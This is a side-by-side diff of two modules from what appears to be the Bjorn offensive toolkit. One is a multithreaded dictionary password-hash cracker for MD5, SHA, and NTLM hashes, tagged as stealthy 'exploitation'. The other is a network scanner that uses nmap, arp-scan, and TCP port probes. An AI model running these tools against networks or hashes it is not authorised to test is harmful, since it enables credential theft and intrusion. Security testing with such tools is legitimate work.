DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn" b_cooldown = 0
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json") b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns # Supported hash types and their patterns
HASH_PATTERNS = { HASH_PATTERNS = {
@@ -40,226 +57,153 @@ HASH_PATTERNS = {
'ntlm': r'^[a-fA-F0-9]{32}$' 'ntlm': r'^[a-fA-F0-9]{32}$'
} }
class RuneCracker: class RuneCracker:
def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR): def __init__(self, shared_data):
self.input_file = input_file self.shared_data = shared_data
self.wordlist = wordlist self.hashes: Set[str] = set()
self.rules = rules self.cracked: Dict[str, Dict[str, Any]] = {}
self.hash_type = hash_type
self.output_dir = output_dir
self.hashes = set()
self.cracked = {}
self.lock = threading.Lock() self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Load mutation rules # Performance tuning for Pi Zero 2
self.mutation_rules = self.load_rules() self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
def load_hashes(self):
"""Load hashes from input file and validate format."""
try:
with open(self.input_file, 'r') as f:
for line in f:
hash_value = line.strip()
if self.hash_type:
if re.match(HASH_PATTERNS[self.hash_type], hash_value):
self.hashes.add(hash_value)
else:
# Try to auto-detect hash type
for h_type, pattern in HASH_PATTERNS.items():
if re.match(pattern, hash_value):
self.hashes.add(hash_value)
break
logging.info(f"Loaded {len(self.hashes)} valid hashes")
except Exception as e:
logging.error(f"Error loading hashes: {e}")
def load_wordlist(self):
"""Load password wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
return ['password', 'admin', '123456', 'qwerty', 'letmein']
def load_rules(self):
"""Load mutation rules."""
if self.rules and os.path.exists(self.rules):
with open(self.rules, 'r') as f:
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
return [
'capitalize',
'lowercase',
'uppercase',
'l33t',
'append_numbers',
'prepend_numbers',
'toggle_case'
]
def apply_mutations(self, word):
"""Apply various mutation rules to a word."""
mutations = set([word])
for rule in self.mutation_rules: def _hash_password(self, password: str, h_type: str) -> Optional[str]:
if rule == 'capitalize':
mutations.add(word.capitalize())
elif rule == 'lowercase':
mutations.add(word.lower())
elif rule == 'uppercase':
mutations.add(word.upper())
elif rule == 'l33t':
mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
.replace('o', '0').replace('s', '5'))
elif rule == 'append_numbers':
mutations.update(word + str(n) for n in range(100))
elif rule == 'prepend_numbers':
mutations.update(str(n) + word for n in range(100))
elif rule == 'toggle_case':
mutations.add(''.join(c.upper() if i % 2 else c.lower()
for i, c in enumerate(word)))
return mutations
def hash_password(self, password, hash_type):
"""Generate hash for a password using specified algorithm.""" """Generate hash for a password using specified algorithm."""
if hash_type == 'md5': try:
return hashlib.md5(password.encode()).hexdigest() if h_type == 'md5':
elif hash_type == 'sha1': return hashlib.md5(password.encode()).hexdigest()
return hashlib.sha1(password.encode()).hexdigest() elif h_type == 'sha1':
elif hash_type == 'sha256': return hashlib.sha1(password.encode()).hexdigest()
return hashlib.sha256(password.encode()).hexdigest() elif h_type == 'sha256':
elif hash_type == 'sha512': return hashlib.sha256(password.encode()).hexdigest()
return hashlib.sha512(password.encode()).hexdigest() elif h_type == 'sha512':
elif hash_type == 'ntlm': return hashlib.sha512(password.encode()).hexdigest()
return hashlib.new('md4', password.encode('utf-16le')).hexdigest() elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None return None
def crack_password(self, password): def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Attempt to crack hashes using a single password and its mutations.""" """Worker function for cracking passwords."""
try: if self.shared_data.orchestrator_should_exit:
mutations = self.apply_mutations(password) return
for mutation in mutations:
for hash_type in HASH_PATTERNS.keys():
if not self.hash_type or self.hash_type == hash_type:
hash_value = self.hash_password(mutation, hash_type)
if hash_value in self.hashes:
with self.lock:
self.cracked[hash_value] = {
'password': mutation,
'hash_type': hash_type,
'timestamp': datetime.now().isoformat()
}
logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")
except Exception as e:
logging.error(f"Error cracking with password {password}: {e}")
def save_results(self): for h_type in HASH_PATTERNS.keys():
"""Save cracked passwords to JSON file.""" if self.hash_type and self.hash_type != h_type:
try: continue
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'total_hashes': len(self.hashes),
'cracked_count': len(self.cracked),
'cracked_hashes': self.cracked
}
output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}") hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
except Exception as e: with self.lock:
logging.error(f"Failed to save results: {e}") if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
def execute(self): progress.advance()
"""Execute the password cracking process."""
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try: try:
logging.info("Starting password cracking process") with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
self.load_hashes() for line in f:
hv = line.strip()
if not self.hashes: if not hv: continue
logging.error("No valid hashes loaded") # Auto-detect or validate
return for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
wordlist = self.load_wordlist() if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
with ThreadPoolExecutor(max_workers=10) as executor: break
executor.map(self.crack_password, wordlist)
self.save_results()
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
except Exception as e: except Exception as e:
logging.error(f"Error during execution: {e}") logger.error(f"Error loading hashes: {e}")
return "failed"
def save_settings(input_file, wordlist, rules, hash_type, output_dir): if not self.hashes:
"""Save settings to JSON file.""" logger.warning("No valid hashes found in input file.")
try: return "failed"
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = { logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
"input_file": input_file, self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
"wordlist": wordlist,
"rules": rules, # Prepare password plan
"hash_type": hash_type, dict_passwords = []
"output_dir": output_dir if wordlist_path and os.path.exists(wordlist_path):
} with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
with open(SETTINGS_FILE, 'w') as f: dict_passwords = [l.strip() for l in f if l.strip()]
json.dump(settings, f) else:
logging.info(f"Settings saved to {SETTINGS_FILE}") # Fallback tiny list
except Exception as e: dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
logging.error(f"Failed to save settings: {e}")
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try: try:
with open(SETTINGS_FILE, 'r') as f: with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
return json.load(f) for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False)
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e: except Exception as e:
logging.error(f"Failed to load settings: {e}") logger.error(f"Cracking engine error: {e}")
return {} return "failed"
def main(): # Save results
parser = argparse.ArgumentParser(description="Advanced password cracker") if self.cracked:
parser.add_argument("-i", "--input", help="Input file containing hashes") os.makedirs(output_dir, exist_ok=True)
parser.add_argument("-w", "--wordlist", help="Path to password wordlist") out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
parser.add_argument("-r", "--rules", help="Path to rules file") with open(out_file, 'w', encoding="utf-8") as f:
parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type") json.dump({
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory") "target_file": input_file,
args = parser.parse_args() "total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
settings = load_settings() "results": self.cracked
input_file = args.input or settings.get("input_file") }, f, indent=4)
wordlist = args.wordlist or settings.get("wordlist") logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
rules = args.rules or settings.get("rules") self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
hash_type = args.type or settings.get("hash_type") return "success"
output_dir = args.output or settings.get("output_dir")
logger.info("Cracking finished. No matches found.")
if not input_file: self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
logging.error("Input file is required. Use -i or save it in settings") return "success" # Still success even if 0 cracked, as it finished the task
return
save_settings(input_file, wordlist, rules, hash_type, output_dir)
cracker = RuneCracker(
input_file=input_file,
wordlist=wordlist,
rules=rules,
hash_type=hash_type,
output_dir=output_dir
)
cracker.execute()
if __name__ == "__main__": if __name__ == "__main__":
main() # Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")

View File

@@ -1,20 +1,24 @@
# scanning.py Network scanner (DB-first, no stubs) # scanning.py Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR) # - Host discovery (nmap -sn -PR)
# - Resolve MAC/hostname (per-host threads) -> DB (hosts table) # - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
# - Port scan (multi-threads) -> DB (merge ports by MAC) # - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run # - Mark alive=0 for hosts not seen this run
# - Update stats (stats table) # - Update stats (stats table)
# - Light logging (milestones) without flooding # - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan # - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - NEW: No DB insert without a real MAC. Unresolved IPs are kept in-memory for this run. # - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
import os import os
import re
import threading import threading
import socket import socket
import time import time
import logging import logging
import subprocess import subprocess
from datetime import datetime from concurrent.futures import ThreadPoolExecutor, as_completed
import datetime
import netifaces import netifaces
from getmac import get_mac_address as gma from getmac import get_mac_address as gma
@@ -35,12 +39,48 @@ b_action = "global"
b_trigger = "on_interval:180" b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}' b_requires = '{"max_concurrent": 1}'
# --- Module-level constants (avoid re-creating per call) ---
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
_BAD_MACS = frozenset({"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"})
# RPi Zero safe defaults (overridable via shared config)
_MAX_HOST_THREADS = 2
_MAX_PORT_THREADS = 4
_PORT_TIMEOUT = 0.8
_MAC_RETRIES = 2
_MAC_RETRY_DELAY = 0.5
_ARPING_TIMEOUT = 1.0
_NMAP_DISCOVERY_TIMEOUT_S = 90
_NMAP_DISCOVERY_ARGS = "-sn -PR --max-retries 1 --host-timeout 8s"
_SCAN_MIN_INTERVAL_S = 600
def _normalize_mac(s):
if not s:
return None
m = _MAC_RE.search(str(s))
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac):
if not mac:
return True
mac_l = mac.lower()
if mac_l in _BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
class NetworkScanner: class NetworkScanner:
""" """
Network scanner that populates SQLite (hosts + stats). No CSV/JSON. Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
Keeps the original fast logic: nmap discovery, per-host threads, per-port threads. Uses ThreadPoolExecutor for bounded concurrency (RPi Zero safe).
NEW: no 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory. No 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
""" """
def __init__(self, shared_data): def __init__(self, shared_data):
self.shared_data = shared_data self.shared_data = shared_data
@@ -52,8 +92,26 @@ class NetworkScanner:
self.lock = threading.Lock() self.lock = threading.Lock()
self.nm = nmap.PortScanner() self.nm = nmap.PortScanner()
self.running = False self.running = False
# Local stop flag for this action instance.
# IMPORTANT: actions must never mutate shared_data.orchestrator_should_exit (global stop signal).
self._stop_event = threading.Event()
self.thread = None
self.scan_interface = None self.scan_interface = None
cfg = getattr(self.shared_data, "config", {}) or {}
self.max_host_threads = max(1, min(8, int(cfg.get("scan_max_host_threads", _MAX_HOST_THREADS))))
self.max_port_threads = max(1, min(16, int(cfg.get("scan_max_port_threads", _MAX_PORT_THREADS))))
self.port_timeout = max(0.3, min(3.0, float(cfg.get("scan_port_timeout_s", _PORT_TIMEOUT))))
self.mac_retries = max(1, min(5, int(cfg.get("scan_mac_retries", _MAC_RETRIES))))
self.mac_retry_delay = max(0.2, min(2.0, float(cfg.get("scan_mac_retry_delay_s", _MAC_RETRY_DELAY))))
self.arping_timeout = max(1.0, min(5.0, float(cfg.get("scan_arping_timeout_s", _ARPING_TIMEOUT))))
self.discovery_timeout_s = max(
20, min(300, int(cfg.get("scan_nmap_discovery_timeout_s", _NMAP_DISCOVERY_TIMEOUT_S)))
)
self.discovery_args = str(cfg.get("scan_nmap_discovery_args", _NMAP_DISCOVERY_ARGS)).strip() or _NMAP_DISCOVERY_ARGS
self.scan_min_interval_s = max(60, int(cfg.get("scan_min_interval_s", _SCAN_MIN_INTERVAL_S)))
self._last_scan_started = 0.0
# progress # progress
self.total_hosts = 0 self.total_hosts = 0
self.scanned_hosts = 0 self.scanned_hosts = 0
@@ -76,9 +134,13 @@ class NetworkScanner:
total = min(max(total, 0), 100) total = min(max(total, 0), 100)
self.shared_data.bjorn_progress = f"{int(total)}%" self.shared_data.bjorn_progress = f"{int(total)}%"
def _should_stop(self) -> bool:
# Treat orchestrator flag as read-only, and combine with local stop event.
return bool(getattr(self.shared_data, "orchestrator_should_exit", False)) or self._stop_event.is_set()
# ---------- network ---------- # ---------- network ----------
def get_network(self): def get_network(self):
if self.shared_data.orchestrator_should_exit: if self._should_stop():
return None return None
try: try:
if self.shared_data.use_custom_network: if self.shared_data.use_custom_network:
@@ -118,7 +180,7 @@ class NetworkScanner:
self.logger.debug(f"nmap_prefixes not found at {path}") self.logger.debug(f"nmap_prefixes not found at {path}")
return vendor_map return vendor_map
try: try:
with open(path, 'r') as f: with open(path, 'r', encoding='utf-8', errors='ignore') as f:
for line in f: for line in f:
line = line.strip() line = line.strip()
if not line or line.startswith('#'): if not line or line.startswith('#'):
@@ -139,8 +201,11 @@ class NetworkScanner:
def get_current_essid(self): def get_current_essid(self):
try: try:
essid = subprocess.check_output(['iwgetid', '-r'], stderr=subprocess.STDOUT, universal_newlines=True).strip() result = subprocess.run(
return essid or "" ['iwgetid', '-r'],
capture_output=True, text=True, timeout=5
)
return (result.stdout or "").strip()
except Exception: except Exception:
return "" return ""
@@ -160,57 +225,34 @@ class NetworkScanner:
Try multiple strategies to resolve a real MAC for the given IP. Try multiple strategies to resolve a real MAC for the given IP.
RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None. RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
NEVER returns 'IP:<ip>'. NEVER returns 'IP:<ip>'.
RPi Zero: reduced retries and timeouts.
""" """
if self.shared_data.orchestrator_should_exit: if self._should_stop():
return None return None
import re
MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
BAD_MACS = {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}
def _normalize_mac(s: str | None) -> str | None:
if not s:
return None
m = MAC_RE.search(s)
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac: str | None) -> bool:
if not mac:
return True
mac_l = mac.lower()
if mac_l in BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
try: try:
mac = None mac = None
# 1) getmac (retry a few times) # 1) getmac (reduced retries for RPi Zero)
retries = 6 retries = self.mac_retries
while not mac and retries > 0 and not self.shared_data.orchestrator_should_exit: while not mac and retries > 0 and not self._should_stop():
try: try:
from getmac import get_mac_address as gma
mac = _normalize_mac(gma(ip=ip)) mac = _normalize_mac(gma(ip=ip))
except Exception: except Exception:
mac = None mac = None
if not mac: if not mac:
time.sleep(1.5) time.sleep(self.mac_retry_delay)
retries -= 1 retries -= 1
# 2) targeted arp-scan # 2) targeted arp-scan
if not mac: if not mac and not self._should_stop():
try: try:
iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0" iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
out = subprocess.check_output( result = subprocess.run(
['sudo', 'arp-scan', '--interface', iface, '-q', ip], ['sudo', 'arp-scan', '--interface', iface, '-q', ip],
universal_newlines=True, stderr=subprocess.STDOUT capture_output=True, text=True, timeout=5
) )
out = result.stdout or ""
for line in out.splitlines(): for line in out.splitlines():
if line.strip().startswith(ip): if line.strip().startswith(ip):
cand = _normalize_mac(line) cand = _normalize_mac(line)
@@ -225,11 +267,13 @@ class NetworkScanner:
self.logger.debug(f"arp-scan fallback failed for {ip}: {e}") self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")
# 3) ip neigh # 3) ip neigh
if not mac: if not mac and not self._should_stop():
try: try:
neigh = subprocess.check_output(['ip', 'neigh', 'show', ip], result = subprocess.run(
universal_newlines=True, stderr=subprocess.STDOUT) ['ip', 'neigh', 'show', ip],
cand = _normalize_mac(neigh) capture_output=True, text=True, timeout=3
)
cand = _normalize_mac(result.stdout or "")
if cand: if cand:
mac = cand mac = cand
except Exception: except Exception:
@@ -247,6 +291,7 @@ class NetworkScanner:
# ---------- port scanning ---------- # ---------- port scanning ----------
class PortScannerWorker: class PortScannerWorker:
"""Port scanner using ThreadPoolExecutor for RPi Zero safety."""
def __init__(self, outer, target, open_ports, portstart, portend, extra_ports): def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
self.outer = outer self.outer = outer
self.target = target self.target = target
@@ -256,10 +301,10 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])] self.extra_ports = [int(p) for p in (extra_ports or [])]
def scan_one(self, port): def scan_one(self, port):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2) s.settimeout(self.outer.port_timeout)
try: try:
s.connect((self.target, port)) s.connect((self.target, port))
with self.outer.lock: with self.outer.lock:
@@ -274,25 +319,25 @@ class NetworkScanner:
self.outer.update_progress('port', 1) self.outer.update_progress('port', 1)
def run(self): def run(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
threads = [] ports = list(range(self.portstart, self.portend)) + self.extra_ports
for port in range(self.portstart, self.portend): if not ports:
if self.outer.shared_data.orchestrator_should_exit: return
break
t = threading.Thread(target=self.scan_one, args=(port,)) with ThreadPoolExecutor(max_workers=self.outer.max_port_threads) as pool:
t.start() futures = []
threads.append(t) for port in ports:
for port in self.extra_ports: if self.outer._should_stop():
if self.outer.shared_data.orchestrator_should_exit: break
break futures.append(pool.submit(self.scan_one, port))
t = threading.Thread(target=self.scan_one, args=(port,)) for f in as_completed(futures):
t.start() if self.outer._should_stop():
threads.append(t) break
for t in threads: try:
if self.outer.shared_data.orchestrator_should_exit: f.result(timeout=self.outer.port_timeout + 1)
break except Exception:
t.join() pass
# ---------- main scan block ---------- # ---------- main scan block ----------
class ScanPorts: class ScanPorts:
@@ -310,20 +355,28 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])] self.extra_ports = [int(p) for p in (extra_ports or [])]
self.ip_data = self.IpData() self.ip_data = self.IpData()
self.ip_hostname_list = [] # tuples (ip, hostname, mac) self.ip_hostname_list = [] # tuples (ip, hostname, mac)
self.host_threads = []
self.open_ports = {} self.open_ports = {}
self.all_ports = [] self.all_ports = []
# NEW: per-run pending cache for unresolved IPs (no DB writes) # per-run pending cache for unresolved IPs (no DB writes)
# ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
self.pending = {} self.pending = {}
def scan_network_and_collect(self): def scan_network_and_collect(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return
with self.outer.lock:
self.outer.shared_data.bjorn_progress = "1%"
t0 = time.time()
try:
self.outer.nm.scan(
hosts=str(self.network),
arguments=self.outer.discovery_args,
timeout=self.outer.discovery_timeout_s,
)
except Exception as e:
self.outer.logger.error(f"Nmap host discovery failed: {e}")
return return
t0 = time.time()
self.outer.nm.scan(hosts=str(self.network), arguments='-sn -PR')
hosts = list(self.outer.nm.all_hosts()) hosts = list(self.outer.nm.all_hosts())
if self.outer.blacklistcheck: if self.outer.blacklistcheck:
hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist] hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]
@@ -331,10 +384,23 @@ class NetworkScanner:
self.outer.total_hosts = len(hosts) self.outer.total_hosts = len(hosts)
self.outer.scanned_hosts = 0 self.outer.scanned_hosts = 0
self.outer.update_progress('host', 0) self.outer.update_progress('host', 0)
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")
elapsed = time.time() - t0
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {elapsed:.1f}s)")
# Update comment for display
self.outer.shared_data.comment_params = {
"hosts_found": str(len(hosts)),
"network": str(self.network),
"elapsed": f"{elapsed:.1f}"
}
# existing hosts (for quick merge) # existing hosts (for quick merge)
existing_rows = self.outer.shared_data.db.get_all_hosts() try:
existing_rows = self.outer.shared_data.db.get_all_hosts()
except Exception as e:
self.outer.logger.error(f"DB get_all_hosts failed: {e}")
existing_rows = []
self.existing_map = {h['mac_address']: h for h in existing_rows} self.existing_map = {h['mac_address']: h for h in existing_rows}
self.seen_now = set() self.seen_now = set()
@@ -342,19 +408,24 @@ class NetworkScanner:
self.vendor_map = self.outer.load_mac_vendor_map() self.vendor_map = self.outer.load_mac_vendor_map()
self.essid = self.outer.get_current_essid() self.essid = self.outer.get_current_essid()
# per-host threads # per-host threads with bounded pool
for host in hosts: max_threads = min(self.outer.max_host_threads, len(hosts)) if hosts else 1
if self.outer.shared_data.orchestrator_should_exit: with ThreadPoolExecutor(max_workers=max_threads) as pool:
return futures = {}
t = threading.Thread(target=self.scan_host, args=(host,)) for host in hosts:
t.start() if self.outer._should_stop():
self.host_threads.append(t) break
f = pool.submit(self.scan_host, host)
futures[f] = host
# wait for f in as_completed(futures):
for t in self.host_threads: if self.outer._should_stop():
if self.outer.shared_data.orchestrator_should_exit: break
return try:
t.join() f.result(timeout=30)
except Exception as e:
ip = futures.get(f, "?")
self.outer.logger.error(f"Host scan thread failed for {ip}: {e}")
self.outer.logger.info( self.outer.logger.info(
f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, " f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
@@ -364,7 +435,10 @@ class NetworkScanner:
# mark unseen as alive=0 # mark unseen as alive=0
existing_macs = set(self.existing_map.keys()) existing_macs = set(self.existing_map.keys())
for mac in existing_macs - self.seen_now: for mac in existing_macs - self.seen_now:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0) try:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
except Exception as e:
self.outer.logger.error(f"Failed to mark {mac} as dead: {e}")
# feed ip_data # feed ip_data
for ip, hostname, mac in self.ip_hostname_list: for ip, hostname, mac in self.ip_hostname_list:
@@ -373,13 +447,19 @@ class NetworkScanner:
self.ip_data.mac_list.append(mac) self.ip_data.mac_list.append(mac)
def scan_host(self, ip): def scan_host(self, ip):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist: if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
return return
try: try:
# ARP ping to help populate neighbor cache # ARP ping to help populate neighbor cache (subprocess with timeout)
os.system(f"arping -c 2 -w 2 {ip} > /dev/null 2>&1") try:
subprocess.run(
['arping', '-c', '2', '-w', str(self.outer.arping_timeout), ip],
capture_output=True, timeout=self.outer.arping_timeout + 2
)
except Exception:
pass
# Hostname (validated) # Hostname (validated)
hostname = "" hostname = ""
@@ -393,7 +473,7 @@ class NetworkScanner:
self.outer.update_progress('host', 1) self.outer.update_progress('host', 1)
return return
time.sleep(1.0) # let ARP breathe time.sleep(0.5) # let ARP breathe (reduced from 1.0 for RPi Zero speed)
mac = self.outer.get_mac_address(ip, hostname) mac = self.outer.get_mac_address(ip, hostname)
if mac: if mac:
@@ -431,10 +511,12 @@ class NetworkScanner:
if ip: if ip:
ips_set.add(ip) ips_set.add(ip)
# Update current hostname + track history
current_hn = "" current_hn = ""
if hostname: if hostname:
self.outer.shared_data.db.update_hostname(mac, hostname) try:
self.outer.shared_data.db.update_hostname(mac, hostname)
except Exception as e:
self.outer.logger.error(f"Failed to update hostname for {mac}: {e}")
current_hn = hostname current_hn = hostname
else: else:
current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else "" current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""
@@ -444,15 +526,18 @@ class NetworkScanner:
key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0) key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
)) if ips_set else None )) if ips_set else None
self.outer.shared_data.db.update_host( try:
mac_address=mac, self.outer.shared_data.db.update_host(
ips=ips_sorted, mac_address=mac,
hostnames=None, ips=ips_sorted,
alive=1, hostnames=None,
ports=None, alive=1,
vendor=vendor or (prev.get('vendor') if prev else ""), ports=None,
essid=self.essid or (prev.get('essid') if prev else None) vendor=vendor or (prev.get('vendor') if prev else ""),
) essid=self.essid or (prev.get('essid') if prev else None)
)
except Exception as e:
self.outer.logger.error(f"Failed to update host {mac}: {e}")
# refresh local cache # refresh local cache
self.existing_map[mac] = dict( self.existing_map[mac] = dict(
@@ -467,19 +552,26 @@ class NetworkScanner:
with self.outer.lock: with self.outer.lock:
self.ip_hostname_list.append((ip, hostname or "", mac)) self.ip_hostname_list.append((ip, hostname or "", mac))
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "mac": mac,
"hostname": hostname or "unknown",
"vendor": vendor or "unknown"
}
self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})") self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")
except Exception as e: except Exception as e:
self.outer.logger.error(f"Error scanning host {ip}: {e}") self.outer.logger.error(f"Error scanning host {ip}: {e}")
finally: finally:
self.outer.update_progress('host', 1) self.outer.update_progress('host', 1)
time.sleep(0.05) time.sleep(0.02) # reduced from 0.05
def start(self): def start(self):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
self.scan_network_and_collect() self.scan_network_and_collect()
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
# init structures for ports # init structures for ports
@@ -496,12 +588,22 @@ class NetworkScanner:
f"(+{len(self.extra_ports)} extra)" f"(+{len(self.extra_ports)} extra)"
) )
# per-IP port scan (threads per port, original logic)
for idx, ip in enumerate(self.ip_data.ip_list, 1): for idx, ip in enumerate(self.ip_data.ip_list, 1):
if self.outer.shared_data.orchestrator_should_exit: if self.outer._should_stop():
return return
worker = self.outer.PortScannerWorker(self.outer, ip, self.open_ports, self.portstart, self.portend, self.extra_ports)
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "progress": f"{idx}/{total_targets}",
"ports_found": str(sum(len(v) for v in self.open_ports.values()))
}
worker = self.outer.PortScannerWorker(
self.outer, ip, self.open_ports,
self.portstart, self.portend, self.extra_ports
)
worker.run() worker.run()
